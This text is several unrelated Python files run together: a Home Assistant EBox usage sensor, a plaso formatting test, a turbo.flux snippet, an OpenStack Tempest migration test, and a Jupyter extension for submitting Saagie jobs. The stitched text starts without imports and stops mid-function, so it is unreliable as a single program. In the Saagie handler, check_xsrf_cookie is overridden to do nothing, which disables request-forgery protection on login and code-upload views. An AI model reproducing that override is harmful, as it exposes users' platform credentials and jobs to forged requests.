GIGABITS = "Gb"
PRICE = "CAD"
DAYS = "days"
PERCENT = "%"

DEFAULT_NAME = "EBox"

REQUESTS_TIMEOUT = 15
SCAN_INTERVAL = timedelta(minutes=15)
MIN_TIME_BETWEEN_UPDATES = timedelta(minutes=15)

SENSOR_TYPES = {
    "usage": ["Usage", PERCENT, "mdi:percent"],
    "balance": ["Balance", PRICE, "mdi:square-inc-cash"],
    "limit": ["Data limit", GIGABITS, "mdi:download"],
    "days_left": ["Days left", DAYS, "mdi:calendar-today"],
    "before_offpeak_download": ["Download before offpeak", GIGABITS, "mdi:download"],
    "before_offpeak_upload": ["Upload before offpeak", GIGABITS, "mdi:upload"],
    "before_offpeak_total": ["Total before offpeak", GIGABITS, "mdi:download"],
    "offpeak_download": ["Offpeak download", GIGABITS, "mdi:download"],
    "offpeak_upload": ["Offpeak Upload", GIGABITS, "mdi:upload"],
    "offpeak_total": ["Offpeak Total", GIGABITS, "mdi:download"],
    "download": ["Download", GIGABITS, "mdi:download"],
    "upload": ["Upload", GIGABITS, "mdi:upload"],
    "total": ["Total", GIGABITS, "mdi:download"],
}

PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
    {
        vol.Required(CONF_MONITORED_VARIABLES): vol.All(
            cv.ensure_list, [vol.In(SENSOR_TYPES)]
        ),
        vol.Required(CONF_USERNAME): cv.string,
        vol.Required(CONF_PASSWORD): cv.string,
        vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
    }
)


async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
    """Set up the EBox sensor."""
    username = config.get(CONF_USERNAME)
    password = config.get(CONF_PASSWORD)

    httpsession = hass.helpers.aiohttp_client.async_get_clientsession()
    ebox_data = EBoxData(username, password, httpsession)

    name = config.get(CONF_NAME)

    from pyebox.client import PyEboxError

    try:
        await ebox_data.async_update()
    except PyEboxError as exp:
        _LOGGER.error("Failed login: %s", exp)
        raise PlatformNotReady

    sensors = []
    for variable in config[CONF_MONITORED_VARIABLES]:
        sensors.append(EBoxSensor(ebox_data, variable, name))

    async_add_entities(sensors, True)


class EBoxSensor(Entity):
    """Implementation of a EBox sensor."""

    def __init__(self, ebox_data, sensor_type, name):
        """Initialize the sensor."""
        self.client_name = name
        self.type = sensor_type
        self._name = SENSOR_TYPES[sensor_type][0]
        self._unit_of_measurement = SENSOR_TYPES[sensor_type][1]
        self._icon = SENSOR_TYPES[sensor_type][2]
        self.ebox_data = ebox_data
        self._state = None

    @property
    def name(self):
        """Return the name of the sensor."""
        return f"{self.client_name} {self._name}"

    @property
    def state(self):
        """Return the state of the sensor."""
        return self._state

    @property
    def unit_of_measurement(self):
        """Return the unit of measurement of this entity, if any."""
        return self._unit_of_measurement

    @property
    def icon(self):
        """Icon to use in the frontend, if any."""
        return self._icon

    async def async_update(self):
        """Get the latest data from EBox and update the state."""
        await self.ebox_data.async_update()
        if self.type in self.ebox_data.data:
            self._state = round(self.ebox_data.data[self.type], 2)


class EBoxData:
    """Get data from Ebox."""

    def __init__(self, username, password, httpsession):
        """Initialize the data object."""
        from pyebox import EboxClient

        self.client = EboxClient(username, password, REQUESTS_TIMEOUT, httpsession)
        self.data = {}

    @Throttle(MIN_TIME_BETWEEN_UPDATES)
    async def async_update(self):
        """Get the latest data from Ebox."""
        from pyebox.client import PyEboxError

        try:
            await self.client.fetch_data()
        except PyEboxError as exp:
            _LOGGER.error("Error on receive last EBox data: %s", exp)
            return
        # Update data
        self.data = self.client.get_data()

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the output module field formatting helper."""

import unittest

from dfdatetime import semantic_time as dfdatetime_semantic_time
from dfvfs.path import fake_path_spec

from plaso.containers import events
from plaso.lib import definitions
from plaso.output import formatting_helper

from tests.containers import test_lib as containers_test_lib
from tests.output import test_lib


class TestFieldFormattingHelper(formatting_helper.FieldFormattingHelper):
  """Field formatter helper for testing purposes."""

  _FIELD_FORMAT_CALLBACKS = {'zone': '_FormatTimeZone'}


class FieldFormattingHelperTest(test_lib.OutputModuleTestCase):
  """Test the output module field formatting helper."""

  # pylint: disable=protected-access

  _TEST_EVENTS = [
      {'data_type': 'test:event',
       'filename': 'log/syslog.1',
       'hostname': 'ubuntu',
       'path_spec': fake_path_spec.FakePathSpec(
           location='log/syslog.1'),
       'text': (
           'Reporter <CRON> PID: 8442 (pam_unix(cron:session): session\n '
           'closed for user root)'),
       'timestamp': '2012-06-27 18:17:01',
       'timestamp_desc': definitions.TIME_DESCRIPTION_CHANGE}]

  def testFormatDateTime(self):
    """Tests the _FormatDateTime function with dynamic time."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))

    date_time_string = test_helper._FormatDateTime(
        event, event_data, event_data_stream)
    self.assertEqual(date_time_string, '2012-06-27T18:17:01.000000+00:00')

    output_mediator.SetTimezone('Europe/Amsterdam')

    date_time_string = test_helper._FormatDateTime(
        event, event_data, event_data_stream)
    self.assertEqual(date_time_string, '2012-06-27T20:17:01.000000+02:00')

    output_mediator.SetTimezone('UTC')
    event.date_time = dfdatetime_semantic_time.InvalidTime()

    date_time_string = test_helper._FormatDateTime(
        event, event_data, event_data_stream)
    self.assertEqual(date_time_string, 'Invalid')

  def testFormatDateTimeWithoutDynamicTime(self):
    """Tests the _FormatDateTime function without dynamic time."""
    output_mediator = self._CreateOutputMediator(dynamic_time=False)
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))

    # Test with event.date_time
    date_time_string = test_helper._FormatDateTime(
        event, event_data, event_data_stream)
    self.assertEqual(date_time_string, '2012-06-27T18:17:01.000000+00:00')

    output_mediator.SetTimezone('Europe/Amsterdam')

    date_time_string = test_helper._FormatDateTime(
        event, event_data, event_data_stream)
    self.assertEqual(date_time_string, '2012-06-27T20:17:01.000000+02:00')

    output_mediator.SetTimezone('UTC')
    event.date_time = dfdatetime_semantic_time.InvalidTime()

    date_time_string = test_helper._FormatDateTime(
        event, event_data, event_data_stream)
    self.assertEqual(date_time_string, '0000-00-00T00:00:00.000000+00:00')

    # Test with event.timestamp
    event.date_time = None
    date_time_string = test_helper._FormatDateTime(
        event, event_data, event_data_stream)
    self.assertEqual(date_time_string, '2012-06-27T18:17:01.000000+00:00')

    event.timestamp = 0
    date_time_string = test_helper._FormatDateTime(
        event, event_data, event_data_stream)
    self.assertEqual(date_time_string, '0000-00-00T00:00:00.000000+00:00')

    event.timestamp = -9223372036854775808
    date_time_string = test_helper._FormatDateTime(
        event, event_data, event_data_stream)
    self.assertEqual(date_time_string, '0000-00-00T00:00:00.000000+00:00')

  def testFormatDisplayName(self):
    """Tests the _FormatDisplayName function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))
    display_name_string = test_helper._FormatDisplayName(
        event, event_data, event_data_stream)
    self.assertEqual(display_name_string, 'FAKE:log/syslog.1')

  def testFormatFilename(self):
    """Tests the _FormatFilename function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))
    filename_string = test_helper._FormatFilename(
        event, event_data, event_data_stream)
    self.assertEqual(filename_string, 'log/syslog.1')

  def testFormatHostname(self):
    """Tests the _FormatHostname function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))
    hostname_string = test_helper._FormatHostname(
        event, event_data, event_data_stream)
    self.assertEqual(hostname_string, 'ubuntu')

  def testFormatInode(self):
    """Tests the _FormatInode function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))
    inode_string = test_helper._FormatInode(
        event, event_data, event_data_stream)
    self.assertEqual(inode_string, '-')

  def testFormatMACB(self):
    """Tests the _FormatMACB function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))
    macb_string = test_helper._FormatMACB(event, event_data, event_data_stream)
    self.assertEqual(macb_string, '..C.')

  def testFormatMessage(self):
    """Tests the _FormatMessage function."""
    output_mediator = self._CreateOutputMediator()

    formatters_directory_path = self._GetTestFilePath(['formatters'])
    output_mediator.ReadMessageFormattersFromDirectory(
        formatters_directory_path)

    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))

    message_string = test_helper._FormatMessage(
        event, event_data, event_data_stream)

    expected_message_string = (
        'Reporter <CRON> PID: 8442 (pam_unix(cron:session): session closed '
        'for user root)')
    self.assertEqual(message_string, expected_message_string)

  def testFormatMessageShort(self):
    """Tests the _FormatMessageShort function."""
    output_mediator = self._CreateOutputMediator()

    formatters_directory_path = self._GetTestFilePath(['formatters'])
    output_mediator.ReadMessageFormattersFromDirectory(
        formatters_directory_path)

    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))

    message_short_string = test_helper._FormatMessageShort(
        event, event_data, event_data_stream)

    expected_message_short_string = (
        'Reporter <CRON> PID: 8442 (pam_unix(cron:session): session closed '
        'for user root)')
    self.assertEqual(message_short_string, expected_message_short_string)

  def testFormatSource(self):
    """Tests the _FormatSource function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))

    source_string = test_helper._FormatSource(
        event, event_data, event_data_stream)

    self.assertEqual(source_string, 'Test log file')

  def testFormatSourceShort(self):
    """Tests the _FormatSourceShort function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))

    source_short_string = test_helper._FormatSourceShort(
        event, event_data, event_data_stream)

    self.assertEqual(source_short_string, 'FILE')

  def testFormatTag(self):
    """Tests the _FormatTag function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    tag_string = test_helper._FormatTag(None)
    self.assertEqual(tag_string, '-')

    event_tag = events.EventTag()
    event_tag.AddLabel('one')
    event_tag.AddLabel('two')

    tag_string = test_helper._FormatTag(event_tag)
    self.assertEqual(tag_string, 'one two')

  def testFormatTime(self):
    """Tests the _FormatTime function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))

    # Test with event.date_time
    time_string = test_helper._FormatTime(
        event, event_data, event_data_stream)
    self.assertEqual(time_string, '18:17:01')

    output_mediator.SetTimezone('Europe/Amsterdam')

    time_string = test_helper._FormatTime(
        event, event_data, event_data_stream)
    self.assertEqual(time_string, '20:17:01')

    output_mediator.SetTimezone('UTC')

    # Test with event.timestamp
    event.date_time = None
    time_string = test_helper._FormatTime(
        event, event_data, event_data_stream)
    self.assertEqual(time_string, '18:17:01')

    event.timestamp = 0
    time_string = test_helper._FormatTime(
        event, event_data, event_data_stream)
    self.assertEqual(time_string, '--:--:--')

    event.timestamp = -9223372036854775808
    time_string = test_helper._FormatTime(
        event, event_data, event_data_stream)
    self.assertEqual(time_string, '--:--:--')

  def testFormatTimeZone(self):
    """Tests the _FormatTimeZone function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))
    zone_string = test_helper._FormatTimeZone(
        event, event_data, event_data_stream)
    self.assertEqual(zone_string, 'UTC')

  def testFormatUsername(self):
    """Tests the _FormatUsername function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))
    username_string = test_helper._FormatUsername(
        event, event_data, event_data_stream)
    self.assertEqual(username_string, '-')

  # TODO: add coverage for _ReportEventError

  def testGetFormattedField(self):
    """Tests the GetFormattedField function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = TestFieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))
    zone_string = test_helper.GetFormattedField(
        'zone', event, event_data, event_data_stream, None)
    self.assertEqual(zone_string, 'UTC')


if __name__ == '__main__':
  unittest.main()

from turbo.flux import Mutation, register, dispatch, register_dispatch

import mutation_types

@register_dispatch('user', mutation_types.INCREASE)
def increase(rank):
    pass


def decrease(rank):
    return dispatch('user', mutation_types.DECREASE, rank)


@register_dispatch('metric', 'inc_qps')
def inc_qps():
    pass
# Copyright 2014 NEC Corporation.  All rights reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import testtools

from tempest.api.compute import base
from tempest.common import waiters
from tempest import config
from tempest.lib.common.utils import data_utils
from tempest.lib import decorators
from tempest.lib import exceptions

CONF = config.CONF


class MigrationsAdminTest(base.BaseV2ComputeAdminTest):
    """Test migration operations supported by admin user"""

    @classmethod
    def setup_clients(cls):
        super(MigrationsAdminTest, cls).setup_clients()
        cls.client = cls.os_admin.migrations_client

    @decorators.idempotent_id('75c0b83d-72a0-4cf8-a153-631e83e7d53f')
    def test_list_migrations(self):
        """Test admin user can get the migrations list"""
        self.client.list_migrations()

    @decorators.idempotent_id('1b512062-8093-438e-b47a-37d2f597cd64')
    @testtools.skipUnless(CONF.compute_feature_enabled.resize,
                          'Resize not available.')
    def test_list_migrations_in_flavor_resize_situation(self):
        """Admin can get the migrations list containing the resized server"""
        server = self.create_test_server(wait_until="ACTIVE")
        server_id = server['id']

        self.resize_server(server_id, self.flavor_ref_alt)

        body = self.client.list_migrations()['migrations']

        instance_uuids = [x['instance_uuid'] for x in body]
        self.assertIn(server_id, instance_uuids)

    def _flavor_clean_up(self, flavor_id):
        try:
            self.admin_flavors_client.delete_flavor(flavor_id)
            self.admin_flavors_client.wait_for_resource_deletion(flavor_id)
        except exceptions.NotFound:
            pass

    @decorators.idempotent_id('33f1fec3-ba18-4470-8e4e-1d888e7c3593')
    @testtools.skipUnless(CONF.compute_feature_enabled.resize,
                          'Resize not available.')
    def test_resize_server_revert_deleted_flavor(self):
        """Test reverting resized server with original flavor deleted

        Tests that we can revert the resize on an instance whose original
        flavor has been deleted.
        """

        # First we have to create a flavor that we can delete so make a copy
        # of the normal flavor from which we'd create a server.
        flavor = self.admin_flavors_client.show_flavor(
            self.flavor_ref)['flavor']
        flavor = self.admin_flavors_client.create_flavor(
            name=data_utils.rand_name('test_resize_flavor_'),
            ram=flavor['ram'],
            disk=flavor['disk'],
            vcpus=flavor['vcpus']
        )['flavor']
        self.addCleanup(self._flavor_clean_up, flavor['id'])

        # Set extra specs same as self.flavor_ref for the created flavor,
        # because the environment may need some special extra specs to
        # create server which should have been contained in
        # self.flavor_ref.
        extra_spec_keys = self.admin_flavors_client.list_flavor_extra_specs(
            self.flavor_ref)['extra_specs']
        if extra_spec_keys:
            self.admin_flavors_client.set_flavor_extra_spec(
                flavor['id'], **extra_spec_keys)

        # Now boot a server with the copied flavor.
        server = self.create_test_server(
            wait_until='ACTIVE', flavor=flavor['id'])
        server = self.servers_client.show_server(server['id'])['server']

        # If 'id' not in server['flavor'], we can only compare the flavor
        # details, so here we should save the to-be-deleted flavor's details,
        # for the flavor comparison after the server resizing.
        if not server['flavor'].get('id'):
            pre_flavor = {}
            body = self.flavors_client.show_flavor(flavor['id'])['flavor']
            for key in ['name', 'ram', 'vcpus', 'disk']:
                pre_flavor[key] = body[key]

        # Delete the flavor we used to boot the instance.
        self._flavor_clean_up(flavor['id'])

        # Now resize the server and wait for it to go into verify state.
        self.servers_client.resize_server(server['id'], self.flavor_ref_alt)
        waiters.wait_for_server_status(self.servers_client, server['id'],
                                       'VERIFY_RESIZE')

        # Now revert the resize, it should be OK even though the original
        # flavor used to boot the server was deleted.
        self.servers_client.revert_resize_server(server['id'])
        waiters.wait_for_server_status(self.servers_client, server['id'],
                                       'ACTIVE')

        server = self.servers_client.show_server(server['id'])['server']
        if server['flavor'].get('id'):
            msg = ('server flavor is not same as flavor!')
            self.assertEqual(flavor['id'], server['flavor']['id'], msg)
        else:
            self.assertEqual(pre_flavor['name'],
                             server['flavor']['original_name'],
                             "original_name in server flavor is not same as "
                             "flavor name!")
            for key in ['ram', 'vcpus', 'disk']:
                msg = ('attribute %s in server flavor is not same as '
                       'flavor!' % key)
                self.assertEqual(pre_flavor[key], server['flavor'][key], msg)

    def _test_cold_migrate_server(self, revert=False):
        if CONF.compute.min_compute_nodes < 2:
            msg = "Less than 2 compute nodes, skipping multinode tests."
            raise self.skipException(msg)

        server = self.create_test_server(wait_until="ACTIVE")
        src_host = self.get_host_for_server(server['id'])

        self.admin_servers_client.migrate_server(server['id'])

        waiters.wait_for_server_status(self.servers_client,
                                       server['id'], 'VERIFY_RESIZE')

        if revert:
            self.servers_client.revert_resize_server(server['id'])
            assert_func = self.assertEqual
        else:
            self.servers_client.confirm_resize_server(server['id'])
            assert_func = self.assertNotEqual

        waiters.wait_for_server_status(self.servers_client,
                                       server['id'], 'ACTIVE')
        dst_host = self.get_host_for_server(server['id'])
        assert_func(src_host, dst_host)

    @decorators.idempotent_id('4bf0be52-3b6f-4746-9a27-3143636fe30d')
    @testtools.skipUnless(CONF.compute_feature_enabled.cold_migration,
                          'Cold migration not available.')
    def test_cold_migration(self):
        """Test cold migrating server and then confirm the migration"""
        self._test_cold_migrate_server(revert=False)

    @decorators.idempotent_id('caa1aa8b-f4ef-4374-be0d-95f001c2ac2d')
    @testtools.skipUnless(CONF.compute_feature_enabled.cold_migration,
                          'Cold migration not available.')
    def test_revert_cold_migration(self):
        """Test cold migrating server and then revert the migration"""
        self._test_cold_migrate_server(revert=True)

from functools import wraps
import json
import os
import traceback
import validators

from jinja2 import Environment, PackageLoader
from notebook.utils import url_path_join
from notebook.base.handlers import IPythonHandler
import requests
from requests.auth import HTTPBasicAuth


env = Environment(
    loader=PackageLoader('saagie', 'jinja2'),
)

SAAGIE_ROOT_URL = os.environ.get("SAAGIE_ROOT_URL", None)
SAAGIE_USERNAME = None
PLATFORMS_URL = None
SAAGIE_BASIC_AUTH_TOKEN = None
JOBS_URL_PATTERN = None
JOB_URL_PATTERN = None
JOB_UPGRADE_URL_PATTERN = None
SCRIPT_UPLOAD_URL_PATTERN = None


def get_absolute_saagie_url(saagie_url):
    if saagie_url.startswith('/'):
        return SAAGIE_ROOT_URL + saagie_url
    return saagie_url


class ResponseError(Exception):
    def __init__(self, status_code):
        self.status_code = status_code
        super(ResponseError, self).__init__(status_code)


class SaagieHandler(IPythonHandler):
    def handle_request(self, method):
        data = {k: v[0].decode() for k, v in self.request.arguments.items()}
        if 'view' not in data:
            self.send_error(404)
            return
        view_name = data.pop('view')
        notebook_path = data.pop('notebook_path', None)
        notebook_json = data.pop('notebook_json', None)
        notebook = Notebook(notebook_path, notebook_json)
        try:
            template_name, template_data = views.render(
                view_name, notebook=notebook, data=data, method=method)
        except ResponseError as e:
            self.send_error(e.status_code)
            return
        except:
            template_name = 'internal_error.html'
            template_data = {'error': traceback.format_exc()}
            self.set_status(500)
        template_data.update(
            notebook=notebook,
        )
        template = env.get_template(template_name)
        self.finish(template.render(template_data))

    def get(self):
        self.handle_request('GET')

    def post(self):
        self.handle_request('POST')

    def check_xsrf_cookie(self):
        return


class SaagieCheckHandler(IPythonHandler):
    def get(self):
        self.finish()


class SaagieJobRun:
    def __init__(self, job, run_data):
        self.job = job
        self.id = run_data['id']
        self.status = run_data['status']
        self.stderr = run_data.get('logs_err', '')
        self.stdout = run_data.get('logs_out', '')


class SaagieJob:
    @classmethod
    def from_id(cls, notebook, platform_id, job_id):
        return SaagieJob(
            notebook,
            requests.get(JOB_URL_PATTERN % (platform_id, job_id), auth=SAAGIE_BASIC_AUTH_TOKEN).json())

    def __init__(self, notebook, job_data):
        self.notebook = notebook
        self.data = job_data
        self.platform_id = job_data['platform_id']
        self.capsule_type = job_data['capsule_code']
        self.id = job_data['id']
        self.name = job_data['name']
        self.last_run = None

    def set_as_current(self):
        self.notebook.current_job = self

    @property
    def url(self):
        return (JOBS_URL_PATTERN + '/%s') % (self.platform_id, self.id)

    @property
    def admin_url(self):
        return get_absolute_saagie_url('/#/manager/%s/job/%s'
                                       % (self.platform_id, self.id))

    @property
    def logs_url(self):
        return self.admin_url + '/logs'

    @property
    def is_started(self):
        return self.last_run is not None

    def fetch_logs(self):
        job_data = requests.get(self.url, auth=SAAGIE_BASIC_AUTH_TOKEN).json()
        run_data = job_data.get('last_instance')
        if run_data is None or run_data['status'] not in ('SUCCESS', 'FAILED'):
            return
        run_data = requests.get(
            get_absolute_saagie_url('/api/v1/jobtask/%s'
                                    % run_data['id']), auth=SAAGIE_BASIC_AUTH_TOKEN).json()
        self.last_run = SaagieJobRun(self, run_data)

    @property
    def details_template_name(self):
        return 'include/python_job_details.html'

    def __str__(self):
        return self.name

    def __eq__(self, other):
        if other is None:
            return False
        return self.platform_id == other.platform_id and self.id == other.id

    def __lt__(self, other):
        if other is None:
            return False
        return self.id < other.id


class SaagiePlatform:
    SUPPORTED_CAPSULE_TYPES = {'python'}

    def __init__(self, notebook, platform_data):
        self.notebook = notebook
        self.id = platform_data['id']
        self.name = platform_data['name']
        self.capsule_types = {c['code'] for c in platform_data['capsules']}

    @property
    def is_supported(self):
        return not self.capsule_types.isdisjoint(self.SUPPORTED_CAPSULE_TYPES)

    def get_jobs(self):
        if not self.is_supported:
            return []

        jobs_data = requests.get(JOBS_URL_PATTERN % self.id, auth=SAAGIE_BASIC_AUTH_TOKEN).json()
        return [SaagieJob(self.notebook, job_data) for job_data in jobs_data
                if job_data['category'] == 'processing' and
                job_data['capsule_code'] in self.SUPPORTED_CAPSULE_TYPES]

    def __eq__(self, other):
        return self.id == other.id


class Notebook:
    CACHE = {}

    def __new__(cls, path, json):
        if path in cls.CACHE:
            return cls.CACHE[path]
        cls.CACHE[path] = new = super(Notebook, cls).__new__(cls)
        return new

    def __init__(self, path, json_data):
        if path is None:
            path = 'Untitled.ipynb'
        if json_data is None:
            json_data = json.dumps({
                'cells': [],
                'metadata': {'kernelspec': {'name': 'python3'}}})
        self.path = path
        self.json = json.loads(json_data)
        # In cached instances, current_job is already defined.
        if not hasattr(self, 'current_job'):
            self.current_job = None

    @property
    def name(self):
        return os.path.splitext(os.path.basename(self.path))[0]

    @property
    def kernel_name(self):
        return self.json['metadata']['kernelspec']['name']

    @property
    def kernel_display_name(self):
        return self.json['metadata']['kernelspec']['display_name']

    def get_code_cells(self):
        return [cell['source'] for cell in self.json['cells']
                if cell['cell_type'] == 'code']

    def get_code(self, indices=None):
        cells = self.get_code_cells()
        if indices is None:
            indices = list(range(len(cells)))
        return '\n\n\n'.join([cells[i] for i in indices])

    def get_platforms(self):
        return [SaagiePlatform(self, platform_data)
                for platform_data in requests.get(PLATFORMS_URL, auth=SAAGIE_BASIC_AUTH_TOKEN).json()]


class ViewsCollection(dict):
    def add(self, func):
        self[func.__name__] = func
        return func

    def render(self, view_name, notebook, data=None, method='GET', **kwargs):
        if data is None:
            data = {}
        try:
            view = views[view_name]
        except KeyError:
            raise ResponseError(404)
        template_data = view(method, notebook, data, **kwargs)
        if isinstance(template_data, tuple):
            template_name, template_data = template_data
        else:
            template_name = view.__name__ + '.html'
        return template_name, template_data


views = ViewsCollection()


@views.add
def modal(method, notebook, data):
    return {}

def clear_basic_auth_token():
    global SAAGIE_BASIC_AUTH_TOKEN
    SAAGIE_BASIC_AUTH_TOKEN = None

# Init an empty Basic Auth token on first launch
clear_basic_auth_token()

def is_logged():
    if SAAGIE_ROOT_URL is None or SAAGIE_BASIC_AUTH_TOKEN is None:
        return False
    else:
        # Check if Basic token is still valid
        is_logged_in = False
        try:
            response = requests.get(SAAGIE_ROOT_URL + '/api/v1/user-current', auth=SAAGIE_BASIC_AUTH_TOKEN, allow_redirects=False)
            is_logged_in = response.ok
        except (requests.ConnectionError, requests.RequestException, requests.HTTPError, requests.Timeout) as err:
            print ('Error while trying to connect to Saagie: ', err)

        if is_logged_in is not True:
            # Remove Basic Auth token from globals. It will force a new login phase.
            clear_basic_auth_token()

        return is_logged_in

def define_globals(saagie_root_url, saagie_username):
    if saagie_root_url is not None:
        global SAAGIE_ROOT_URL
        global SAAGIE_USERNAME
        global PLATFORMS_URL
        global JOBS_URL_PATTERN
        global JOB_URL_PATTERN
        global JOB_UPGRADE_URL_PATTERN
        global SCRIPT_UPLOAD_URL_PATTERN
        SAAGIE_USERNAME = saagie_username
        SAAGIE_ROOT_URL = saagie_root_url.strip("/")
        PLATFORMS_URL = SAAGIE_ROOT_URL + '/api/v1/platform'
        JOBS_URL_PATTERN = PLATFORMS_URL + '/%s/job'
        JOB_URL_PATTERN = JOBS_URL_PATTERN + '/%s'
        JOB_UPGRADE_URL_PATTERN = JOBS_URL_PATTERN + '/%s/version'
        SCRIPT_UPLOAD_URL_PATTERN = JOBS_URL_PATTERN + '/upload'

@views.add
def login_form(method, notebook, data):
    if method == 'POST':
        # check if the given Saagie URL is well formed
        if not validators.url(data['saagie_root_url']):
            return {'error': 'Invalid URL', 'saagie_root_url': data['saagie_root_url'] or '', 'username': data['username'] or ''}

        define_globals(data['saagie_root_url'], data['username'])

        try:
            basic_token = HTTPBasicAuth(data['username'], data['password'])
            current_user_response = requests.get(SAAGIE_ROOT_URL + '/api/v1/user-current', auth=basic_token, allow_redirects=False)

            if current_user_response.ok:
                # Login succeeded, keep the basic token for future API calls
                global SAAGIE_BASIC_AUTH_TOKEN
                SAAGIE_BASIC_AUTH_TOKEN = basic_token

        except (requests.ConnectionError, requests.RequestException, requests.HTTPError, requests.Timeout) as err:
            print ('Error while trying to connect to Saagie: ', err)
            return {'error': 'Connection error', 'saagie_root_url': SAAGIE_ROOT_URL, 'username': SAAGIE_USERNAME or ''}

        if SAAGIE_BASIC_AUTH_TOKEN is not None:
            return views.render('capsule_type_chooser', notebook)

        return {'error': 'Invalid URL, username or password.', 'saagie_root_url': SAAGIE_ROOT_URL, 'username': SAAGIE_USERNAME or ''}
    if is_logged():
        return views.render('capsule_type_chooser', notebook)
    return {'error': None, 'saagie_root_url': SAAGIE_ROOT_URL or '', 'username': SAAGIE_USERNAME or ''}


def login_required(view):
    @wraps(view)
    def inner(method, notebook, data, *args, **kwargs):
        if not is_logged():
            return views.render('login_form', notebook)
        return view(method, notebook, data, *args, **kwargs)
    return inner


@views.add
@login_required
def capsule_type_chooser(method, notebook, data):
    return {'username': SAAGIE_USERNAME}


def get_job_form(method, notebook, data):
    context = {'platforms': notebook.get_platforms()}
    context['values'] = ({'current': {'options': {}}} if notebook.current_job is None
                         else notebook.current_job.data)
    return context


def create_job_base_data(data):
    return {
        'platform_id': data['saagie-platform'],
        'category': 'processing',
        'name': data['job-name'],
        'description': data['description'],
        'current': {
            'cpu': data['cpu'],
            'disk': data['disk'],
            'memory': data['ram'],
            'isInternalSubDomain': False,
            'isInternalPort': False,
            'options': {}
        }
    }


def upload_python_script(notebook, data):
    code = notebook.get_code(map(int, data.get('code-lines', '').split('|')))
    files = {'file': (data['job-name'] + '.py', code)}
    return requests.post(
        SCRIPT_UPLOAD_URL_PATTERN % data['saagie-platform'],
        files=files, auth=SAAGIE_BASIC_AUTH_TOKEN).json()['fileName']


@views.add
@login_required
def python_job_form(method, notebook, data):
    if method == 'POST':
        platform_id = data['saagie-platform']

        job_data = create_job_base_data(data)
        job_data['capsule_code'] = 'python'
        job_data['always_email'] = False
        job_data['manual'] = True
        job_data['retry'] = ''

        current = job_data['current']
        current['options']['language_version'] = data['language-version']
        current['releaseNote'] = data['release-note']
        current['template'] = data['shell-command']
        current['file'] = upload_python_script(notebook, data)

        new_job_data = requests.post(JOBS_URL_PATTERN % platform_id,
                                    json=job_data, auth=SAAGIE_BASIC_AUTH_TOKEN).json()
        job = SaagieJob(notebook, new_job_data)
        job.set_as_current()
        return views.render('starting_job', notebook, {'job': job})

    context = get_job_form(method, notebook, data)
    context['action'] = '/saagie?view=python_job_form'
    context['username'] = SAAGIE_USERNAME
    return context


@views.add
@login_required
def update_python_job(method, notebook, data):
    if method == 'POST':
        job = notebook.current_job
        platform_id = job.platform_id
        data['saagie-platform'] = platform_id
        data['job-name'] = job.name
        data['description'] = ''
        current = create_job_base_data(data)['current']
        current['options']['language_version'] = data['language-version']
        current['releaseNote'] = data['release-note']
        current['template'] = data['shell-command']
        current['file'] = upload_python_script(notebook, data)

